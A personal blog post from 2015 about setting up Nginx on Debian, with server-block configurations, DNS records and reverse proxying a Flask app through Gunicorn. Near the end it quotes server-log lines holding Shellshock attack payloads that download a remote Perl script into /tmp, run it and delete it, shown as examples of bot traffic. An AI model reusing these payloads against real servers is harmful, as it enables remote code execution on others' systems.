Up and Running with Nginx

2015-02-18

An accounting of my attempts to set up Nginx, Flask, and the mess that I call my corner of the internet.

It seems a theme for this whole blog might be: repackaging information you could find somewhere else. In keeping with that theme I'll be writing-up how I set up Nginx and this site in general; all in an effort to document some of the sticking points I experienced and commit it to memory.

There's a variety of resources available online on how to configure Nginx. The official documentation is okay, but like most project documentation the tone was a bit over my head as I just began things. There are plenty of people who've gone to the trouble of documenting how they've set up Nginx or Flask, or any number of frameworks and configurations, the trouble I found was that none were either exactly what I wanted or were out of date with the most recent changes to the different parts of the web stack. So what's one more voice chiming in with an unasked opinion? To the best of my knowledge these notes are accurate as of the post date.

Getting Started

Though I didn't think to check at the time, I think it's probably best to ensure Nginx is up-to-date before anything else. A downside to running Debian stable on the server is that some packages can lag the more recent changes, which isn't necessarily an issue but in the case of a web server like Nginx there were several security fixes that the packaged version did not have. So I drew it in from an available backport:

Adding the line:

    deb <http://security.debian.org/> wheezy/updates main

to /etc/apt/sources.list and then installing with:

    apt-get -t wheezy-backports install nginx

where the -t flag is for a target release. Which, in my case, brought my system up to 1.6.2 to account for CVE-2014-3616.

Nginx is pretty liberal in the configurations which it will happily accept, which meant I initially had a rather poorly thought out nginx.conf file peppered with all manner of server blocks and directives. I quickly ran into the headaches associated with managing the configuration for several subdomains from a single config file though and found my way to the sites-available and sites-enabled directory structure advised by the Nginx documentation.

As an example of my current configuration, I've set up the subdomain for this blog in a file, idle.nprescott.com, in the sites-available directory as follows:

    server {
            listen 80;
            root /home/nolan/idle;
            index index.html index.htm index.nginx-debian.html;
            server_name idle.nprescott.com www.idle.nprescott.com;
            location / {
                    try_files $uri $uri/ =404;
            }
    }

Which means I can sync the entire output directory generated by Frog into a single directory on my server ¹. The sites-available is symlinked into the sites-enabled directory with the following:

    ln -s idle.nprescott.com ../sites-enabled/idle.nprescott.com

DNS Configuration

With the server properly configured it is important to configure the DNS records for the new subdomain (which I touched on in this post). The major takeaway in my case was to ensure I had set:

    CNAME    *    nprescott.com

Which effectively defers the various subdomain routing to Nginx's server block configurations, as seen above.

Also on the subject of DNS setup, one thing that was very much set-and-forget was the A record for my entire site. The A record is the address record responsible for routing traffic from my domain name to the server's IP address. Just for kicks you can also browse my home page at http://107.170.216.189/.

I haven't yet given much thought to the breakdown for subdomains vs. regular addressing on my site - I'm told subdomains can (temporarily) confuse SEO efforts (or hurt existing rankings). I can safely say that's not something I'm worried about at this time.

Reverse Proxying WSGI Applications

Slightly more difficult than serving static resources through Nginx was configuring the web server to reverse proxy an application server such as Gunicorn. To reverse proxy Gunicorn for glue-boy, a Flask application, I have the following configuration file in sites-available:

    server {
      listen 80;
      server_name glue.nprescott.com www.glue.nprescott.com;
      root /home/nolan/glue-boy;

      access_log /home/nolan/glue-boy/logs/access.log;
      error_log  /home/nolan/glue-boy/logs/error.log;

      location / {
                  proxy_pass http://127.0.0.1:8000;
                  proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                  proxy_set_header Host $http_host;
            }
    }

Which I use in conjunction with Gunicorn, kicked off with:

    gunicorn -w=4 --bind=localhost:8000 glue-boy:app \
    --log-file /home/nolan/glue-boy/logs/gunicorn.log --daemon

Untested Ideas

While this blog is entirely static content, the web applications I've spoken about above do present a larger attack surface for the various bad actors of the internet. A cursory glance through the server logs gives some idea to the sheer number of jerks trying to ruin my day ²:

    $ sed -n '/perl/p' access.log | curl -F "content=<-" http://glue.nprescott.com

    91.202.104.5 - - [17/Feb/2015:11:12:18 +0000] "GET / HTTP/1.1" 200 1504 "-" "()\
    { :;};/usr/bin/perl -e 'print \x22Content-Type:\
    text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget\
    [webaddress for some-jerkoffs-malware.txt] -O /tmp/b.pl;curl -O /tmp/b.pl\
    [webaddress for some-jerkoffs-malware.txt];perl /tmp/b.pl;rm -rf\
    /tmp/b.pl*\x22);'"
    ...
    ...

    107.170.243.205 - - [18/Feb/2015:02:18:48 +0000] "GET /cgi-bin/sat-ir-web.pl\
    HTTP/1.1" 404 134 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type:\
    text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget\
    [webaddress for some-jerkoffs-malware.txt] -O /tmp/b.pl;curl -O /tmp/b.pl\
    [webaddress for some-jerkoffs-malware.txt];perl /tmp/b.pl;rm -rf\
    /tmp/b.pl*\x22);'"
    ...
    ...

On and on, sometimes hundreds of request in the span of minutes. I've given some thought to building a system to periodically log these request and the IPs from which they originate in order to blacklist them, along the lines of a bot blackhole. There's also the opportunity to draw some kind of metrics from the logs, I don't much care about those "metrics" derived from things like Google Analytics (which I don't bother with), but it could be passingly interesting (or depressing) to visualize the number of (seemingly) human request to bot requests.

Which reminds me, I currently just scp the whole output directory to the server, I think rsync might be smarter in terms of skipping unchanged files
On any given day it seems most bots break down to about 50/50 PHP exploits and shellshock exploits